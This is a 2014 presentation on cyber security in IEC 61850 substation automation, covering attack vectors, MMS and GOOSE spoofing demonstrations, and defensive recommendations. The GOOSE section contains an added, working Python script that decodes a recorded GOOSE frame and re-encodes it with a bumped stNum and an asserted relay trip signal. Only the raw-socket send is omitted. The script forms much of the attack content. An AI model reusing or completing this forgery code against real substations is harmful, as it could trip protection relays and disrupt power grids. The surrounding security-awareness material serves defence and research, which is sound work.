Cyber Security in Substation Automation (IEC 61850)


Braguta M.V., Nikandrov M.V., August 2014

Modern Control Systems: Trends and Risks

• Recent trend: migration to Ethernet/IP network protocols
• High density of Intelligent Electronic Devices (IEDs) per controlled unit
• Real-time telemetry transmission is in high demand
• Lack of security at the control-device level; default access credentials are commonly left in place
• Lack of cyber security knowledge and incident readiness

Major risks:
- Unauthorized remote access to the control room, devices and the manufacturing process
- Information theft; modification or alteration of network data
- Denial of service; sabotage of the manufacturing process

Industry Incidents by Verticals

[Chart: incidents by industry vertical. The energy sector is the most affected industry.]

The Attack Vectors

[Network diagram: attack vectors. Elements: the Internet; two routers; a corporate network with a control center and an engineering workstation; a substation Ethernet network with operator workstations 1 and 2, an engineering workstation, a redundant server station and switches; relay protection terminals and the object management of a 220 kV overhead line (ВЛ 220 кВ; switchgear labels W2E, K2E, QW2E, QS2, QS3, QSG 2, QSG3.1, QSG3.2).]

Information Disclosure: public websites

Social Networks Risks

[Screenshot: an employee's social-network profile publicly lists the employer (JSC MRSK-Centra, belgorodenergo) and the friend list (516 friends).]

USB devices: Major source of infection

Ransom Blockers at Control Room

IEC 61850 Capabilities

Advantages:
- Promotes high interoperability between systems from different vendors
- Defines basic services

Main protocols: MMS (Manufacturing Message Specification, client/server over TCP/IP) and GOOSE (Generic Object Oriented Substation Event, multicast directly over Ethernet at Layer 2)

1. Spoofing of MMS

Sending false switchgear-position data to the SCADA system

• Record network traffic
• Analyze the transferred data
• Construct the message
• Send it to SCADA

Constructing the Message

Sending to SCADA

http://youtu.be/MbxRhQP42N0

2. Spoofing of MMS

Sending a false breaker position to the relay protection terminal

• Record network traffic
• Analyze the transferred data
• Construct the message
• Send it to the relay terminal

Sending to the Relay Terminal

http://youtu.be/oh5IAN3euK4

Result of the Unauthorized Command

3. GOOSE spoofing - easy!

Sending false commands to the relay terminal from another relay terminal

• Record network traffic
• Analyze the transferred data
• Edit the message
• Publish the message

Editing the Message

Sending the False GOOSE Message

http://youtu.be/fdnPkqIUWfA

Result of the Spoofing

GOOSE spoofing can be applied to all relay terminals certified by "Rosseti" (the Russian power grid company)
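The three spoofing procedures above (record, analyze, construct or edit, send) share one shape, and the GOOSE case is the easiest to show end to end: GOOSE is plain BER over raw Ethernet (EtherType 0x88B8) with no authentication, so a frame recorded from the substation LAN can be decoded, edited and re-published, and a subscriber will take the edited copy as long as the control-block fields match and stNum is higher than the last one it saw. The Python below is an added example and is not the presenters' code or any tool shown in the videos. It builds a constructed stand-in for a recorded GOOSE frame (the control-block, dataset and goID names and MAC addresses are made up), parses it, and produces the edited message with stNum bumped, sqNum reset and the first trip signal asserted. It only encodes boolean dataset members and zeroes the t (timestamp) field, which a real publisher would update; putting the result on the wire (a raw AF_PACKET socket on the substation LAN) is left out. The two MMS cases above follow the same steps over MMS on TCP port 102, but need the full ISO stack (RFC 1006/COTP, session, presentation, ACSE) and do not fit in a short example.

```python
import struct

GOOSE_ETHERTYPE = 0x88B8

# --- minimal BER helpers (GOOSE uses context-specific primitive tags) ---

def ber_len(n):
    """Encode a BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def tlv(tag, value):
    return bytes([tag]) + ber_len(len(value)) + value

def ber_int(v):
    """Shortest two's-complement big-endian encoding of an ASN.1 INTEGER."""
    n = 1
    while not -(1 << (8 * n - 1)) <= v < (1 << (8 * n - 1)):
        n += 1
    return v.to_bytes(n, "big", signed=True)

def parse_tlvs(buf):
    """Split a BER byte string into a list of (tag, value) pairs."""
    out, i = [], 0
    while i < len(buf):
        tag, ln = buf[i], buf[i + 1]
        i += 2
        if ln & 0x80:                      # long-form length
            n = ln & 0x7F
            ln = int.from_bytes(buf[i:i + n], "big")
            i += n
        out.append((tag, buf[i:i + ln]))
        i += ln
    return out

# --- build / parse a GOOSE frame (IEC 61850-8-1 goosePdu, booleans only) ---

def build_goose(dst, src, appid, gocb_ref, dat_set, go_id, st_num, sq_num,
                values, ttl_ms=2000, conf_rev=1):
    all_data = b"".join(tlv(0x83, b"\x01" if v else b"\x00") for v in values)
    body = (tlv(0x80, gocb_ref.encode())       # gocbRef
            + tlv(0x81, ber_int(ttl_ms))       # timeAllowedtoLive
            + tlv(0x82, dat_set.encode())      # datSet
            + tlv(0x83, go_id.encode())        # goID
            + tlv(0x84, bytes(8))              # t: UTC time, zeroed placeholder here
            + tlv(0x85, ber_int(st_num))       # stNum: incremented when data changes
            + tlv(0x86, ber_int(sq_num))       # sqNum: counts repeats, 0 after a change
            + tlv(0x87, b"\x00")               # simulation/test = false
            + tlv(0x88, ber_int(conf_rev))     # confRev
            + tlv(0x89, b"\x00")               # ndsCom = false
            + tlv(0x8A, ber_int(len(values)))  # numDatSetEntries
            + tlv(0xAB, all_data))             # allData
    pdu = tlv(0x61, body)
    header = struct.pack(">HHHHH", GOOSE_ETHERTYPE, appid, 8 + len(pdu), 0, 0)
    return dst + src + header + pdu

def parse_goose(frame):
    dst, src = frame[0:6], frame[6:12]
    ethertype, appid, length, _r1, _r2 = struct.unpack(">HHHHH", frame[12:22])
    if ethertype != GOOSE_ETHERTYPE:
        raise ValueError("not a GOOSE frame")
    (tag, body), = parse_tlvs(frame[22:22 + length - 8])
    if tag != 0x61:
        raise ValueError("expected goosePdu")
    f = dict(parse_tlvs(body))

    def sint(b):
        return int.from_bytes(b, "big", signed=True)

    return {
        "dst": dst, "src": src, "appid": appid,
        "gocbRef": f[0x80].decode(), "ttl": sint(f[0x81]),
        "datSet": f[0x82].decode(), "goID": f[0x83].decode(),
        "stNum": sint(f[0x85]), "sqNum": sint(f[0x86]), "confRev": sint(f[0x88]),
        "values": [v != b"\x00" for t, v in parse_tlvs(f[0xAB]) if t == 0x83],
    }

# --- the "edit and publish" step ---

def spoof_goose(captured, new_values):
    """Re-encode a captured GOOSE message with different data.

    The publisher's identity fields and src MAC are kept; only stNum is bumped
    (and sqNum reset), which is exactly what a genuine state change looks like."""
    p = parse_goose(captured)
    return build_goose(p["dst"], p["src"], p["appid"], p["gocbRef"], p["datSet"],
                       p["goID"], p["stNum"] + 1, 0, new_values,
                       ttl_ms=p["ttl"], conf_rev=p["confRev"])

# Constructed stand-in for a frame recorded from the substation LAN (not a real capture).
CAPTURED = build_goose(
    dst=bytes.fromhex("010ccd010001"), src=bytes.fromhex("001122334455"),
    appid=0x1000, gocb_ref="PROT1CTRL/LLN0$GO$gcb01", dat_set="PROT1CTRL/LLN0$DS01",
    go_id="PROT1_TRIP", st_num=7, sq_num=3, values=[False, False])   # trip signals idle

if __name__ == "__main__":
    print(parse_goose(CAPTURED))
    forged = spoof_goose(CAPTURED, [True, False])   # assert the first trip signal
    print(parse_goose(forged))
```

The point the parser makes visible is how little the forgery has to get right: every field the subscriber checks is copied from the recorded frame, and the only thing that must change is the stNum.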

Prevention and Protection

The IEC 61850 standard supports RSA digital signatures (specified in its companion security standard IEC 62351-6 for GOOSE and Sampled Values).

However, NONE of the IED relays available on the market (as of this presentation, 2014) offer support for digital signatures.

Antivirus Issue: a false positive is quite dangerous

Suggestions

Short-term goals:
• Stop ignoring the problem;
• Allocate time for cyber security personnel education and awareness in the security policy. Cover basic cyber security and social engineering at least once or twice a year;
• Reduce the attack surface and mitigate attack vectors using available methods and security standards.

Long-term goals:
• Deploy industrial antivirus solutions certified for the manufacturing zone;
• Use intrusion detection and deep packet inspection systems;
• Add an integrity control system to protect manufacturing-zone subnets and network assets; detect unknown or unauthorized assets on the network perimeter;
• Be able to isolate and manage device firmware and detect unauthorized access or modifications;
• Plan to migrate to encrypted network communications in the manufacturing zone.

Conclusions

• Power control systems need a special, carefully designed cyber security policy;
• The overall state of the organization's cyber security policy is poor and demands immediate attention;
• The organization's cyber security policy must be reconsidered as a whole with respect to the latest local and international standards and advisories, the growing danger of ICS threats, and the lack of personnel readiness to detect threats;
• The power control systems require a security audit of all facilities as well as compliance with modern cyber security standards and practices (local and international);
• Cyber security requirements must be considered during the design and implementation stages of all new objects and facilities;
• All cyber security systems must go through extensive testing before being installed in a control room or connected to power equipment. The testing should be done at the manufacturer as well as at the organization's own test facilities, in an environment close to the real one.

Thank you for your time!

Nikandrov Maksim, nixmak@mail.ru

Special appreciation to «Kaspersky Lab»